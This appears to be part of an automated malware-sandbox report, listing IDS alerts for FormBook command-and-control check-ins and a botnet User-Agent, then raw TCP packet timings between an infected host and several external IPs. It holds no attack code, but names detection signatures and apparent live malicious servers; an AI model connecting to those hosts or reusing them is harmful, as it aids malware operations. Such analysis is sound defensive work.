05/30/24-15:02:17.759709	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49720	80	192.168.2.5	162.241.2.254
05/30/24-15:04:57.271773	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49758	80	192.168.2.5	66.96.162.149
05/30/24-15:04:18.617047	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49749	80	192.168.2.5	35.214.235.206
05/30/24-15:02:44.852667	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49728	80	192.168.2.5	64.46.118.35
05/30/24-15:03:14.076659	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49733	80	192.168.2.5	162.0.213.94
05/30/24-15:03:35.574703	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49740	80	192.168.2.5	172.82.177.221
05/30/24-15:04:41.047717	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49753	80	192.168.2.5	18.178.206.118
05/30/24-15:04:48.666326	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49756	80	192.168.2.5	18.178.206.118
05/30/24-15:03:21.696469	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49736	80	192.168.2.5	162.0.213.94
05/30/24-15:04:12.883535	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49748	80	192.168.2.5	194.9.94.86
05/30/24-15:02:12.367937	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49718	80	192.168.2.5	162.241.2.254
05/30/24-15:02:44.852667	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49728	80	192.168.2.5	64.46.118.35
05/30/24-15:04:05.262156	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49745	80	192.168.2.5	194.9.94.86
05/30/24-15:02:23.540355	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49721	80	192.168.2.5	185.137.235.125
05/30/24-15:02:59.772899	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49732	80	192.168.2.5	54.179.173.60
05/30/24-15:02:31.154627	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49724	80	192.168.2.5	185.137.235.125
05/30/24-15:03:35.574703	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49740	80	192.168.2.5	172.82.177.221
05/30/24-15:02:37.254955	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49725	80	192.168.2.5	64.46.118.35
05/30/24-15:03:27.976839	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49737	80	192.168.2.5	172.82.177.221
05/30/24-15:02:52.166621	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49729	80	192.168.2.5	54.179.173.60
05/30/24-15:04:21.152967	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49750	80	192.168.2.5	35.214.235.206
05/30/24-15:02:31.154627	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49724	80	192.168.2.5	185.137.235.125
05/30/24-15:04:43.592360	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49754	80	192.168.2.5	18.178.206.118
05/30/24-15:02:09.829422	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49717	80	192.168.2.5	162.241.2.254
05/30/24-15:02:59.772899	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49732	80	192.168.2.5	54.179.173.60
05/30/24-15:03:30.506003	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49738	80	192.168.2.5	172.82.177.221
05/30/24-15:02:17.759709	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49720	80	192.168.2.5	162.241.2.254
05/30/24-15:05:02.336329	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49760	80	192.168.2.5	66.96.162.149
05/30/24-15:03:16.623154	TCP	2844299	ETPRO TROJAN MSIL/Juliens Botnet User-Agent	49734	80	192.168.2.5	162.0.213.94
05/30/24-15:03:49.320168	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49744	80	192.168.2.5	15.204.0.108

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 30, 2024 15:01:53.877856970 CEST	49715	80	192.168.2.5	195.35.39.119
May 30, 2024 15:01:53.882807970 CEST	80	49715	195.35.39.119	192.168.2.5
May 30, 2024 15:01:53.882896900 CEST	49715	80	192.168.2.5	195.35.39.119
May 30, 2024 15:01:53.884972095 CEST	49715	80	192.168.2.5	195.35.39.119
May 30, 2024 15:01:53.889904022 CEST	80	49715	195.35.39.119	192.168.2.5
May 30, 2024 15:01:54.452708006 CEST	80	49715	195.35.39.119	192.168.2.5
May 30, 2024 15:01:54.454087973 CEST	80	49715	195.35.39.119	192.168.2.5
May 30, 2024 15:01:54.454279900 CEST	49715	80	192.168.2.5	195.35.39.119
May 30, 2024 15:01:54.457199097 CEST	49715	80	192.168.2.5	195.35.39.119
May 30, 2024 15:01:54.462034941 CEST	80	49715	195.35.39.119	192.168.2.5
May 30, 2024 15:02:09.822459936 CEST	49717	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:09.827459097 CEST	80	49717	162.241.2.254	192.168.2.5
May 30, 2024 15:02:09.827590942 CEST	49717	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:09.829421997 CEST	49717	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:09.834254026 CEST	80	49717	162.241.2.254	192.168.2.5
May 30, 2024 15:02:10.334723949 CEST	80	49717	162.241.2.254	192.168.2.5
May 30, 2024 15:02:10.335891962 CEST	80	49717	162.241.2.254	192.168.2.5
May 30, 2024 15:02:10.335982084 CEST	49717	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:11.340068102 CEST	49717	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:12.360029936 CEST	49718	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:12.365050077 CEST	80	49718	162.241.2.254	192.168.2.5
May 30, 2024 15:02:12.365241051 CEST	49718	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:12.367937088 CEST	49718	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:12.372967958 CEST	80	49718	162.241.2.254	192.168.2.5
May 30, 2024 15:02:12.890940905 CEST	80	49718	162.241.2.254	192.168.2.5
May 30, 2024 15:02:12.891647100 CEST	80	49718	162.241.2.254	192.168.2.5
May 30, 2024 15:02:12.891705036 CEST	49718	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:13.871404886 CEST	49718	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:14.889403105 CEST	49719	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:14.894439936 CEST	80	49719	162.241.2.254	192.168.2.5
May 30, 2024 15:02:14.894534111 CEST	49719	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:14.896195889 CEST	49719	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:14.901058912 CEST	80	49719	162.241.2.254	192.168.2.5
May 30, 2024 15:02:14.901155949 CEST	80	49719	162.241.2.254	192.168.2.5
May 30, 2024 15:02:15.400264025 CEST	80	49719	162.241.2.254	192.168.2.5
May 30, 2024 15:02:15.400398016 CEST	80	49719	162.241.2.254	192.168.2.5
May 30, 2024 15:02:15.400464058 CEST	49719	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:16.402579069 CEST	49719	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:17.421392918 CEST	49720	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:17.757708073 CEST	80	49720	162.241.2.254	192.168.2.5
May 30, 2024 15:02:17.757864952 CEST	49720	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:17.759708881 CEST	49720	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:17.765922070 CEST	80	49720	162.241.2.254	192.168.2.5
May 30, 2024 15:02:18.273046017 CEST	80	49720	162.241.2.254	192.168.2.5
May 30, 2024 15:02:18.273075104 CEST	80	49720	162.241.2.254	192.168.2.5
May 30, 2024 15:02:18.273083925 CEST	80	49720	162.241.2.254	192.168.2.5
May 30, 2024 15:02:18.273181915 CEST	80	49720	162.241.2.254	192.168.2.5
May 30, 2024 15:02:18.273302078 CEST	49720	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:18.273302078 CEST	49720	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:18.277026892 CEST	49720	80	192.168.2.5	162.241.2.254
May 30, 2024 15:02:18.281899929 CEST	80	49720	162.241.2.254	192.168.2.5
May 30, 2024 15:02:23.533597946 CEST	49721	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:23.538507938 CEST	80	49721	185.137.235.125	192.168.2.5
May 30, 2024 15:02:23.538613081 CEST	49721	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:23.540354967 CEST	49721	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:23.545223951 CEST	80	49721	185.137.235.125	192.168.2.5
May 30, 2024 15:02:24.327908039 CEST	80	49721	185.137.235.125	192.168.2.5
May 30, 2024 15:02:24.327929020 CEST	80	49721	185.137.235.125	192.168.2.5
May 30, 2024 15:02:24.327986002 CEST	49721	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:24.328278065 CEST	80	49721	185.137.235.125	192.168.2.5
May 30, 2024 15:02:24.328326941 CEST	49721	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:25.043047905 CEST	49721	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:26.068967104 CEST	49722	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:26.073842049 CEST	80	49722	185.137.235.125	192.168.2.5
May 30, 2024 15:02:26.073915958 CEST	49722	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:26.075643063 CEST	49722	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:26.080516100 CEST	80	49722	185.137.235.125	192.168.2.5
May 30, 2024 15:02:26.859580994 CEST	80	49722	185.137.235.125	192.168.2.5
May 30, 2024 15:02:26.859612942 CEST	80	49722	185.137.235.125	192.168.2.5
May 30, 2024 15:02:26.859678030 CEST	80	49722	185.137.235.125	192.168.2.5
May 30, 2024 15:02:26.859746933 CEST	49722	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:26.859746933 CEST	49722	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:27.590046883 CEST	49722	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:28.608047962 CEST	49723	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:28.613092899 CEST	80	49723	185.137.235.125	192.168.2.5
May 30, 2024 15:02:28.613236904 CEST	49723	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:28.614833117 CEST	49723	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:28.619735956 CEST	80	49723	185.137.235.125	192.168.2.5
May 30, 2024 15:02:28.619867086 CEST	80	49723	185.137.235.125	192.168.2.5
May 30, 2024 15:02:29.431919098 CEST	80	49723	185.137.235.125	192.168.2.5
May 30, 2024 15:02:29.431941032 CEST	80	49723	185.137.235.125	192.168.2.5
May 30, 2024 15:02:29.431996107 CEST	80	49723	185.137.235.125	192.168.2.5
May 30, 2024 15:02:29.432012081 CEST	49723	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:29.432063103 CEST	49723	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:30.121233940 CEST	49723	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:31.147880077 CEST	49724	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:31.152966022 CEST	80	49724	185.137.235.125	192.168.2.5
May 30, 2024 15:02:31.153059006 CEST	49724	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:31.154627085 CEST	49724	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:31.159491062 CEST	80	49724	185.137.235.125	192.168.2.5
May 30, 2024 15:02:31.936499119 CEST	80	49724	185.137.235.125	192.168.2.5
May 30, 2024 15:02:31.936691999 CEST	80	49724	185.137.235.125	192.168.2.5
May 30, 2024 15:02:31.936759949 CEST	49724	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:31.938790083 CEST	49724	80	192.168.2.5	185.137.235.125
May 30, 2024 15:02:31.943639040 CEST	80	49724	185.137.235.125	192.168.2.5
May 30, 2024 15:02:37.248467922 CEST	49725	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:37.253302097 CEST	80	49725	64.46.118.35	192.168.2.5
May 30, 2024 15:02:37.253375053 CEST	49725	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:37.254955053 CEST	49725	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:37.259789944 CEST	80	49725	64.46.118.35	192.168.2.5
May 30, 2024 15:02:38.476325989 CEST	80	49725	64.46.118.35	192.168.2.5
May 30, 2024 15:02:38.476411104 CEST	80	49725	64.46.118.35	192.168.2.5
May 30, 2024 15:02:38.476463079 CEST	49725	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:38.476496935 CEST	80	49725	64.46.118.35	192.168.2.5
May 30, 2024 15:02:38.476510048 CEST	80	49725	64.46.118.35	192.168.2.5
May 30, 2024 15:02:38.476542950 CEST	49725	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:38.481194973 CEST	80	49725	64.46.118.35	192.168.2.5
May 30, 2024 15:02:38.481662989 CEST	80	49725	64.46.118.35	192.168.2.5
May 30, 2024 15:02:38.481725931 CEST	49725	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:38.761822939 CEST	49725	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:39.781354904 CEST	49726	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:39.786530972 CEST	80	49726	64.46.118.35	192.168.2.5
May 30, 2024 15:02:39.786621094 CEST	49726	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:39.788191080 CEST	49726	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:39.793540001 CEST	80	49726	64.46.118.35	192.168.2.5
May 30, 2024 15:02:41.005680084 CEST	80	49726	64.46.118.35	192.168.2.5
May 30, 2024 15:02:41.005698919 CEST	80	49726	64.46.118.35	192.168.2.5
May 30, 2024 15:02:41.005712032 CEST	80	49726	64.46.118.35	192.168.2.5
May 30, 2024 15:02:41.005747080 CEST	49726	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:41.009829998 CEST	80	49726	64.46.118.35	192.168.2.5
May 30, 2024 15:02:41.009886026 CEST	49726	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:41.010086060 CEST	80	49726	64.46.118.35	192.168.2.5
May 30, 2024 15:02:41.010150909 CEST	49726	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:41.293108940 CEST	49726	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:42.311763048 CEST	49727	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:42.316728115 CEST	80	49727	64.46.118.35	192.168.2.5
May 30, 2024 15:02:42.316878080 CEST	49727	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:42.319205046 CEST	49727	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:42.324162006 CEST	80	49727	64.46.118.35	192.168.2.5
May 30, 2024 15:02:42.324215889 CEST	80	49727	64.46.118.35	192.168.2.5
May 30, 2024 15:02:43.559993029 CEST	80	49727	64.46.118.35	192.168.2.5
May 30, 2024 15:02:43.560045004 CEST	80	49727	64.46.118.35	192.168.2.5
May 30, 2024 15:02:43.560070038 CEST	80	49727	64.46.118.35	192.168.2.5
May 30, 2024 15:02:43.560111046 CEST	49727	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:43.562985897 CEST	80	49727	64.46.118.35	192.168.2.5
May 30, 2024 15:02:43.563029051 CEST	49727	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:43.563086033 CEST	80	49727	64.46.118.35	192.168.2.5
May 30, 2024 15:02:43.563162088 CEST	49727	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:43.828778028 CEST	49727	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:44.844192028 CEST	49728	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:44.849212885 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:44.850954056 CEST	49728	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:44.852667093 CEST	49728	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:44.857597113 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:46.066042900 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:46.066057920 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:46.066093922 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:46.066204071 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:46.066219091 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:46.066232920 CEST	49728	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:46.066235065 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:46.066251040 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:46.066266060 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:46.066277981 CEST	49728	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:46.066281080 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:46.066293955 CEST	49728	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:46.066298008 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:46.066309929 CEST	49728	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:46.066345930 CEST	49728	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:46.068216085 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:46.068267107 CEST	49728	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:46.073347092 CEST	49728	80	192.168.2.5	64.46.118.35
May 30, 2024 15:02:46.078195095 CEST	80	49728	64.46.118.35	192.168.2.5
May 30, 2024 15:02:52.158621073 CEST	49729	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:52.163665056 CEST	80	49729	54.179.173.60	192.168.2.5
May 30, 2024 15:02:52.163733006 CEST	49729	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:52.166620970 CEST	49729	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:52.171511889 CEST	80	49729	54.179.173.60	192.168.2.5
May 30, 2024 15:02:53.163419962 CEST	80	49729	54.179.173.60	192.168.2.5
May 30, 2024 15:02:53.163459063 CEST	80	49729	54.179.173.60	192.168.2.5
May 30, 2024 15:02:53.163470030 CEST	80	49729	54.179.173.60	192.168.2.5
May 30, 2024 15:02:53.163480043 CEST	80	49729	54.179.173.60	192.168.2.5
May 30, 2024 15:02:53.163491964 CEST	80	49729	54.179.173.60	192.168.2.5
May 30, 2024 15:02:53.163506031 CEST	80	49729	54.179.173.60	192.168.2.5
May 30, 2024 15:02:53.163517952 CEST	80	49729	54.179.173.60	192.168.2.5
May 30, 2024 15:02:53.163536072 CEST	49729	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:53.163605928 CEST	49729	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:53.163883924 CEST	80	49729	54.179.173.60	192.168.2.5
May 30, 2024 15:02:53.163894892 CEST	80	49729	54.179.173.60	192.168.2.5
May 30, 2024 15:02:53.163906097 CEST	80	49729	54.179.173.60	192.168.2.5
May 30, 2024 15:02:53.164056063 CEST	80	49729	54.179.173.60	192.168.2.5
May 30, 2024 15:02:53.164084911 CEST	49729	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:53.164371967 CEST	49729	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:53.684165955 CEST	49729	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:54.704200983 CEST	49730	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:54.709120035 CEST	80	49730	54.179.173.60	192.168.2.5
May 30, 2024 15:02:54.714138031 CEST	49730	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:54.714138031 CEST	49730	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:54.719053984 CEST	80	49730	54.179.173.60	192.168.2.5
May 30, 2024 15:02:55.689260006 CEST	80	49730	54.179.173.60	192.168.2.5
May 30, 2024 15:02:55.689290047 CEST	80	49730	54.179.173.60	192.168.2.5
May 30, 2024 15:02:55.689301968 CEST	80	49730	54.179.173.60	192.168.2.5
May 30, 2024 15:02:55.689315081 CEST	80	49730	54.179.173.60	192.168.2.5
May 30, 2024 15:02:55.689327002 CEST	80	49730	54.179.173.60	192.168.2.5
May 30, 2024 15:02:55.689342022 CEST	49730	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:55.689373016 CEST	49730	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:55.689985037 CEST	80	49730	54.179.173.60	192.168.2.5
May 30, 2024 15:02:55.689996958 CEST	80	49730	54.179.173.60	192.168.2.5
May 30, 2024 15:02:55.690007925 CEST	80	49730	54.179.173.60	192.168.2.5
May 30, 2024 15:02:55.690032959 CEST	49730	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:55.690061092 CEST	49730	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:55.690293074 CEST	80	49730	54.179.173.60	192.168.2.5
May 30, 2024 15:02:55.690346956 CEST	49730	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:56.215017080 CEST	49730	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:57.233114958 CEST	49731	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:57.238183975 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:57.240247965 CEST	49731	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:57.244148970 CEST	49731	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:57.249110937 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:57.249129057 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:58.211244106 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:58.211292982 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:58.211328030 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:58.211344004 CEST	49731	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:58.211363077 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:58.211399078 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:58.211409092 CEST	49731	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:58.211819887 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:58.211867094 CEST	49731	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:58.211879015 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:58.211889982 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:58.211900949 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:58.211910009 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:58.211921930 CEST	49731	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:58.211952925 CEST	49731	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:58.212095022 CEST	80	49731	54.179.173.60	192.168.2.5
May 30, 2024 15:02:58.212137938 CEST	49731	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:58.746325970 CEST	49731	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:59.765470982 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:59.770488977 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:02:59.770564079 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:59.772898912 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:02:59.777852058 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.714371920 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.714412928 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.714518070 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.714621067 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.714632988 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.714641094 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.714644909 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.714665890 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.714678049 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.714692116 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.714693069 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.714704990 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.714711905 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.714741945 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.714790106 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.719690084 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.719733000 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.722217083 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.947190046 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.947216034 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.947227001 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.947238922 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.947252035 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.947390079 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.947390079 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.947504997 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.947577000 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.947597980 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.947604895 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.947611094 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.947623014 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.947643995 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.947729111 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.948394060 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.948440075 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.948451996 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.948462963 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.948616028 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.948931932 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:00.952261925 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.956125021 CEST	49732	80	192.168.2.5	54.179.173.60
May 30, 2024 15:03:00.961044073 CEST	80	49732	54.179.173.60	192.168.2.5
May 30, 2024 15:03:14.068501949 CEST	49733	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:14.074385881 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.074456930 CEST	49733	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:14.076658964 CEST	49733	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:14.082765102 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.678502083 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.678525925 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.678702116 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.678716898 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.678795099 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.678805113 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.678817987 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.678828955 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.678853989 CEST	49733	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:14.678853989 CEST	49733	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:14.678905010 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.678917885 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.679450035 CEST	49733	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:14.680299044 CEST	49733	80	192.168.2.5	162.0.213.94
May 30, 2024 15:03:14.683923960 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.683939934 CEST	80	49733	162.0.213.94	192.168.2.5
May 30, 2024 15:03:14.683952093 CEST	80	49733	162.0.213.94	192.168.2.5
